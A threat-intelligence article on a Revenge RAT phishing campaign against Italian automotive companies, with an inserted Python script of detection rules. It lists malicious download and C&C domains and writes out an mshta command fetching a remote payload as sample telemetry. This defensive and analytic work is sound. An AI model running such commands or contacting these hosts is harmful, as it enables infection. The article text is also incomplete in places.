Recently, researchers from the Cybaze-Yoroi ZLab observed and analyzed a malware implant weaponized to target companies in the Italian automotive sector. The researchers found that the malware was propagated through a spoofed email pretending to come from a senior partner of Veirano Advogados, a Brazilian business law firm.
More details on the analysis
The malicious phishing email observed during the CSDC operations contained a Microsoft PowerPoint add-in document (“.ppa” extension), equipped with auto-open VBA macro code.
The auto-open VBA macro in the '.ppa' file contained a single simple instruction that invokes the mshta.exe tool to download and execute the next stage of the malicious dropper, retrieved from hxxps://minhacasaminhavidacdt[.]blogspot[.]com/.
The Blogspot-hosted web page downloaded by mshta.exe appears harmless at a quick glance: opening it in a browser shows a perfectly rendered work-in-progress blog page. A closer look at its source code, however, reveals VBScript code hidden behind the blog page.
The malware author tried to make the script look like Microsoft's own work, adding comments taken from a legitimate Microsoft utility, Security Affairs reported.
“Update
Copyright: Microsoft Corp.
‘This script is designed to be used only for scheduled tasks(s).’
‘There is no extensive error check, and will not dump the output from the Powershell CmdLet.’
‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}’”
These comments are taken from the “SyncAppvPublishingServer” utility, which ships on Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. The rest of the script, however, carries out a series of malicious actions such as:
Once executed, the Revenge RAT immediately contacts its C&C servers, sending the victim system’s information. In the analyzed sample, the malware author configured two different C&C destinations: “office365update[.]duckdns[.]org” and “systen32[.]ddns[.]net“.
If one of these servers is down, the malware contacts the other one. At the time of writing, both remote C&C servers were down, so the researchers could only emulate the server behavior in order to analyze the information sent by the RAT. The malware communicates with the server over a TCP connection.
Document.exe file
Researchers found that the ‘Document.exe’ file was hosted at “cdtmaster[.]com[.]br” and was downloaded onto the victim’s system by the “Z3j[.]vbs” script. This PE32 file uses a Pokemon Megaball image as its program icon, and its purpose is to deploy and run the “Outlook.exe” payload.
When the “Outlook.exe” payload is executed, it stays dormant, generating no outgoing network traffic and no file system modifications, but it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“. Researchers are still analyzing the Outlook.exe sample to determine its real behavior.
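The infection chain described above (an Office add-in spawning mshta.exe with a remote URL, a script host dropping Document.exe from the user's Temp directory, and the RAT resolving dynamic-DNS C&C hosts) maps directly onto host-based detection rules. The following Python script is an added example, not part of the article or of Cybaze-Yoroi's analysis: it runs three such rules over constructed sample telemetry in a made-up key=value format (real Sysmon or EDR events would need their own parser), using only the process names and domains the article lists; the process names POWERPNT.EXE, wscript.exe and the Temp path are assumptions about how the chain would appear in endpoint logs.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real Sysmon/EDR output) in a simplified
# "key=value" format. Hostnames are the download and C&C domains the article
# lists; process names and paths are assumed from the chain it describes
# (PowerPoint add-in -> mshta.exe -> VBScript -> Document.exe -> Outlook.exe
# -> dynamic-DNS C&C).
SAMPLE_EVENTS = [
    "type=process parent=POWERPNT.EXE image=mshta.exe "
    "cmdline=mshta.exe https://minhacasaminhavidacdt.blogspot.com/",
    "type=process parent=explorer.exe image=notepad.exe cmdline=notepad.exe notes.txt",
    "type=process parent=wscript.exe image=Document.exe "
    "cmdline=C:\\Users\\user\\AppData\\Local\\Temp\\Document.exe",
    "type=dns image=Outlook.exe query=office365update.duckdns.org",
    "type=dns image=Outlook.exe query=systen32.ddns.net",
    "type=dns image=chrome.exe query=www.microsoft.com",
    "type=netconn image=Outlook.exe dst=127.0.0.1 dport=49356 initiated=false",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Dynamic-DNS providers used by this campaign's C&C; extend with your own list.
DYNDNS_SUFFIXES = (".duckdns.org", ".ddns.net")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# A value runs until the next " key=" token or end of line, so command lines
# that contain spaces survive the split.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


@dataclass
class Finding:
    rule: str
    detail: str
    event: str


def parse_event(line: str) -> dict:
    """Turn one 'key=value key=value' record into a dict."""
    return {k: v for k, v in KV_RE.findall(line)}


def check_event(ev: dict, raw: str) -> list:
    """Apply the three campaign-derived rules to one parsed event."""
    findings = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmdline = ev.get("cmdline", "")

    if kind == "process":
        # Rule 1: an Office application launches a script host with a remote
        # URL on its command line (the .ppa macro -> mshta.exe stage).
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS and URL_RE.search(cmdline):
            findings.append(Finding("office_spawns_downloader", f"{parent} -> {image} {cmdline}", raw))
        # Rule 2: a script host starts an executable from the user's Temp
        # directory (the Z3j.vbs -> Document.exe stage).
        if parent in SCRIPT_HOSTS and image.endswith(".exe") and "\\appdata\\local\\temp\\" in cmdline.lower():
            findings.append(Finding("script_host_drops_exe", f"{parent} -> {cmdline}", raw))
    elif kind == "dns":
        # Rule 3: DNS lookup of a dynamic-DNS hostname (the C&C destinations).
        query = ev.get("query", "").lower()
        if query.endswith(DYNDNS_SUFFIXES):
            findings.append(Finding("dyndns_query", f"{image} resolved {query}", raw))
    return findings


def detect(lines) -> list:
    """Run the rules over an iterable of raw event lines, preserving order."""
    results = []
    for raw in lines:
        results.extend(check_event(parse_event(raw), raw))
    return results


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Run against the sample, the script flags the Office-to-mshta launch, the script-host drop of Document.exe and both dynamic-DNS lookups, while the notepad and chrome events pass. The localhost listener on port 49356 is deliberately not alerted on: many legitimate programs bind 127.0.0.1, so on its own it is context for an investigation rather than a detection.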
Conclusions
After the initial analysis, the researchers have not yet attributed the attack to any specific group. It is worth noting, however, that the TTPs used by the threat actor are similar to those of other groups tracked by Unit 42 researchers, including the use of similar infrastructure and several common files.
Further technical details about the Roma225